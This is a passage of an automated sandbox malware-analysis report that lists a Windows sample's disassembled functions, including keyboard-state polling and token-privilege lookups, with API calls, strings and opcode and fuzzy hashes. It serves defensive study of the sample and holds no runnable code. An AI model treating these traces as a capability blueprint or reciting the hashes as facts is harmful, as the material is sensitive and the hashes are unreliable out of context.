                                                                              • Opcode Fuzzy Hash: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                                                              • Instruction Fuzzy Hash: 3F91B0715043019FDB14DF24C884BAB77A8EF84715F04896FFD85AA281E778E905CBAB
                                                                              Function 0046F50B Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 157windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00456354: GetCursorPos.USER32(004A83D8), ref: 0045636A
                                                                                • Part of subcall function 00456354: ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                                                                • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563D0
                                                                                • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563DC
                                                                              • DefDlgProcW.USER32(?,00000205,?,?,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F55F
                                                                              • ImageList_DragLeave.COMCTL32(00000000,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F57D
                                                                              • ImageList_EndDrag.COMCTL32 ref: 0046F583
                                                                              • ReleaseCapture.USER32 ref: 0046F589
                                                                              • SetWindowTextW.USER32(?,00000000), ref: 0046F620
                                                                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0046F630
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                              • String ID: @GUI_DRAGFILE$@GUI_DROPID$HH
                                                                              • API String ID: 2483343779-2060113733
                                                                              • Opcode ID: b963958ab96ed52e1c3ab3b45c628991f908dc465e455618a5f6fc8545d443fb
                                                                              • Instruction ID: 4b94e37398fb4c0e8bf176de98e3888209b69965db7f8e5b86c8cb252d1f017b
                                                                              • Opcode Fuzzy Hash: b963958ab96ed52e1c3ab3b45c628991f908dc465e455618a5f6fc8545d443fb
                                                                              • Instruction Fuzzy Hash: EB5106716043119BD700DF18DC85FAF77A5EB89310F04492EF941973A2DB789D49CBAA
                                                                              Function 0046FD7F Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 143windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 0046FD8A
                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,004A83D8,?), ref: 0046FDF0
                                                                              • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 0046FE0E
                                                                              • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,004A83D8,?), ref: 0046FE20
                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 0046FEA5
                                                                              • SendMessageW.USER32(?,0000113F,00000000,?), ref: 0046FEDF
                                                                              • GetClientRect.USER32(?,?), ref: 0046FEF2
                                                                              • RedrawWindow.USER32(?,?,00000000,00000000), ref: 0046FF02
                                                                              • DestroyIcon.USER32(?), ref: 0046FFCC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                              • String ID: 2
                                                                              • API String ID: 1331449709-450215437
                                                                              • Opcode ID: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                                                              • Instruction ID: e79942d1a0196d9b5e30c5c178d8ccafd59c9ae1e7fac48b8759c586c5a3b44e
                                                                              • Opcode Fuzzy Hash: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                                                              • Instruction Fuzzy Hash: EB51AC702043019FD320CF44D885BAABBE5FB88700F04487EE684872A2D7B5A849CB5A
                                                                              Function 00450E7D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DestroyWindow.USER32(?,?,?,?,?,?,00000000,static,00000000,00000000,?,?,00000000,00000000,?,00000000), ref: 00450EE1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: DestroyWindow
                                                                              • String ID: static
                                                                              • API String ID: 3375834691-2160076837
                                                                              • Opcode ID: 88f11647011456fbb04f7235260bd1d02a964e72c1c4e3b3fb6640230c73d37f
                                                                              • Instruction ID: 4605c95b1b006c90d65e271c0fdf07f62d21d56273c2870bf7f2e3decf5281c5
                                                                              • Opcode Fuzzy Hash: 88f11647011456fbb04f7235260bd1d02a964e72c1c4e3b3fb6640230c73d37f
                                                                              • Instruction Fuzzy Hash: 4531B572200300BBD7109B64DC45F6BB3A8EBC9711F204A2EFA50D72C0D7B4E8048B69
                                                                              Function 004393E2 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 109threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439409
                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 0043940C
                                                                              • GetCurrentProcess.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?), ref: 0043941D
                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 00439420
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 0043945B
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 00439474
                                                                              • _memcmp.LIBCMT ref: 004394A9
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004394F8
                                                                              Strings
                                                                              • SeAssignPrimaryTokenPrivilege, xrefs: 00439455
                                                                              • SeIncreaseQuotaPrivilege, xrefs: 0043946A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CurrentLookupOpenPrivilegeTokenValue$CloseHandleThread_memcmp
                                                                              • String ID: SeAssignPrimaryTokenPrivilege$SeIncreaseQuotaPrivilege
                                                                              • API String ID: 1446985595-805462909
                                                                              • Opcode ID: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                              • Instruction ID: 628aaead06b6f58e004e5b45c2ed9710a22b4d2b921ab75b424857e8fd72c9d6
                                                                              • Opcode Fuzzy Hash: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                              • Instruction Fuzzy Hash: DB31A371508312ABC710DF21CD41AAFB7E8FB99704F04591EF98193240E7B8DD4ACBAA
                                                                              Function 0045D83D Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 86COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D848
                                                                              • GetDriveTypeW.KERNEL32(?,?), ref: 0045D8A3
                                                                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D94A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$DriveType
                                                                              • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$HH
                                                                              • API String ID: 2907320926-41864084
                                                                              • Opcode ID: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                                              • Instruction ID: d4cab332979e247f8c2da9788294718902473fa09eb5ff996f03d25688ce9cbb
                                                                              • Opcode Fuzzy Hash: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                                              • Instruction Fuzzy Hash: C7318B75A083008FC310EF65E48481EB7A1AFC8315F648D2FF945A7362C779D9068BAB
                                                                              Function 00467214 Relevance: 16.8, APIs: 11, Instructions: 313COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 004672E6
                                                                              • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046735D
                                                                              • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467375
                                                                              • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004673ED
                                                                              • SafeArrayGetVartype.OLEAUT32(CE8B7824,?), ref: 00467418
                                                                              • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467445
                                                                              • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046746A
                                                                              • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 00467559
                                                                              • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 0046748A
                                                                                • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                              • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467571
                                                                              • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004675E4
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ArraySafe$Data$AccessUnaccess$Exception@8ThrowVartype_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                              • String ID:
                                                                              • API String ID: 1932665248-0
                                                                              • Opcode ID: 2f069d425a14989955c91583bf1eee78d18cf75f4644af0e6fd4452b58d9bd04
                                                                              • Instruction ID: 42a0e90c8bf2b482c85e144861ec280134e9fb1dbd9e00a0d693b148f8e5f150
                                                                              • Opcode Fuzzy Hash: 2f069d425a14989955c91583bf1eee78d18cf75f4644af0e6fd4452b58d9bd04
                                                                              • Instruction Fuzzy Hash: E8B1BF752082009FD304DF29C884B6B77E5FF98318F14496EE98587362E779E885CB6B
                                                                              Function 004480F2 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00448182
                                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00448185
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 004481A7
                                                                              • _memset.LIBCMT ref: 004481BA
                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481CC
                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0044824E
                                                                              • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482A4
                                                                              • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482BE
                                                                              • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482E3
                                                                              • SendMessageW.USER32(?,0000101E,00000001,00000000), ref: 004482FC
                                                                              • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448317
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$LongWindow_memset
                                                                              • String ID:
                                                                              • API String ID: 830647256-0
                                                                              • Opcode ID: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                                                                              • Instruction ID: 69fd08a602074ed3d664547bad3ac5a94a9e6c02d61aa1d07dc3907ec7ad0976
                                                                              • Opcode Fuzzy Hash: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                                                                              • Instruction Fuzzy Hash: 41616F70208341AFE310DF54C881FABB7A4FF89704F14465EFA909B2D1DBB5A945CB56
                                                                              Function 0046EA7F Relevance: 16.7, APIs: 11, Instructions: 167windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                                                              • DestroyAcceleratorTable.USER32(?), ref: 0046EA9F
                                                                              • ImageList_Destroy.COMCTL32(?), ref: 0046EB04
                                                                              • ImageList_Destroy.COMCTL32(?), ref: 0046EB18
                                                                              • ImageList_Destroy.COMCTL32(?), ref: 0046EB24
                                                                              • DeleteObject.GDI32(004E0000), ref: 0046EB4F
                                                                              • DestroyIcon.USER32(004D0041), ref: 0046EB67
                                                                              • DeleteObject.GDI32(A39BDBFC), ref: 0046EB7F
                                                                              • DestroyWindow.USER32(0069006C), ref: 0046EB97
                                                                              • DestroyIcon.USER32(?), ref: 0046EBBF
                                                                              • DestroyIcon.USER32(?), ref: 0046EBCD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateRectTableWindow
                                                                              • String ID:
                                                                              • API String ID: 802431696-0
                                                                              • Opcode ID: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                                                                              • Instruction ID: 42d633cefbe7d7192e7a113645d0a532909e6831d49db23f2259be933aabe8c6
                                                                              • Opcode Fuzzy Hash: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                                                                              • Instruction Fuzzy Hash: 17513178600202DFDB14DF26D894E2A77E9FB4AB14B54446EE502CB361EB38EC41CB5E
                                                                              Function 00444D52 Relevance: 16.6, APIs: 11, Instructions: 132keyboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetKeyboardState.USER32(?,?,?), ref: 00444D8A
                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00444E0F
                                                                              • GetKeyState.USER32(000000A0), ref: 00444E26
                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00444E40
                                                                              • GetKeyState.USER32(000000A1), ref: 00444E51
                                                                              • GetAsyncKeyState.USER32(00000011), ref: 00444E69
                                                                              • GetKeyState.USER32(00000011), ref: 00444E77
                                                                              • GetAsyncKeyState.USER32(00000012), ref: 00444E8F
                                                                              • GetKeyState.USER32(00000012), ref: 00444E9D
                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00444EB5
                                                                              • GetKeyState.USER32(0000005B), ref: 00444EC3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: State$Async$Keyboard
                                                                              • String ID:
                                                                              • API String ID: 541375521-0
                                                                              • Opcode ID: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
                                                                              • Instruction ID: c605e69a62dfc64c618b97cb3a1930d242a0674024be490a091b983f03ece729
                                                                              • Opcode Fuzzy Hash: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
                                                                              • Instruction Fuzzy Hash: 6A41C3646087C52DFB31966484017E7FFD16FA2708F58844FD1C5067C2DBAEA9C8C7AA
                                                                              Function 004507E7 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 146windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004508CB
                                                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 004508DB
                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,00001036,00000000,?,000000FF,?,SysListView32,004848E8,00000000), ref: 004508FC
                                                                              • _wcslen.LIBCMT ref: 00450944
                                                                              • _wcscat.LIBCMT ref: 00450955
                                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045096C
                                                                              • SendMessageW.USER32(?,00001061,?,?), ref: 0045099B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window_wcscat_wcslen
                                                                              • String ID: -----$SysListView32
                                                                              • API String ID: 4008455318-3975388722
                                                                              • Opcode ID: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
                                                                              • Instruction ID: 786a3889ee88f98d9b0e9b4b0e1dacf7018a6923f31dd28eeaa3c07ad082d1a6
                                                                              • Opcode Fuzzy Hash: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
                                                                              • Instruction Fuzzy Hash: 17519470504340ABE330DB65C885FABB3E4AF84714F104E1EFA94972D3D6B99989CB65
                                                                              Function 00448602 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00448625
                                                                              • CreateMenu.USER32 ref: 0044863C
                                                                              • SetMenu.USER32(?,00000000), ref: 0044864C
                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 004486D6
                                                                              • IsMenu.USER32(?), ref: 004486EB
                                                                              • CreatePopupMenu.USER32 ref: 004486F5
                                                                              • InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 00448739
                                                                              • DrawMenuBar.USER32 ref: 00448742
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                              • String ID: 0
                                                                              • API String ID: 176399719-4108050209
                                                                              • Opcode ID: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                                                                              • Instruction ID: 98f94d81d6847d6484dd50bbdc77a0bd9f9f2d632c710d3394220f00cc789bef
                                                                              • Opcode Fuzzy Hash: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                                                                              • Instruction Fuzzy Hash: 86417675604201AFD700CF68D894A9BBBE4FF89314F14891EFA488B350DBB5A845CFA6
                                                                              Function 004691F4 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469277
                                                                              • GetDlgCtrlID.USER32(00000000), ref: 00469289
                                                                              • GetParent.USER32 ref: 004692A4
                                                                              • SendMessageW.USER32(00000000,?,00000111), ref: 004692A7
                                                                              • GetDlgCtrlID.USER32(00000000), ref: 004692AE
                                                                              • GetParent.USER32 ref: 004692C7
                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 004692CA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CtrlParent$_wcslen
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 2040099840-1403004172
                                                                              • Opcode ID: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                                                              • Instruction ID: ef07326ddff4210f4741e87947fad3c2ec39ee11b6619cfdf8cc81125e1c6f8c
                                                                              • Opcode Fuzzy Hash: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                                                              • Instruction Fuzzy Hash: BC21D6716002147BD600AB65CC45DBFB39CEB85324F044A1FF954A73D1DAB8EC0947B9
                                                                              Function 004693F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 87windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • SendMessageW.USER32(00000186,00000186,?,00000000), ref: 00469471
                                                                              • GetDlgCtrlID.USER32(00000000), ref: 00469483
                                                                              • GetParent.USER32 ref: 0046949E
                                                                              • SendMessageW.USER32(00000000,?,00000111), ref: 004694A1
                                                                              • GetDlgCtrlID.USER32(00000000), ref: 004694A8
                                                                              • GetParent.USER32 ref: 004694C1
                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 004694C4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
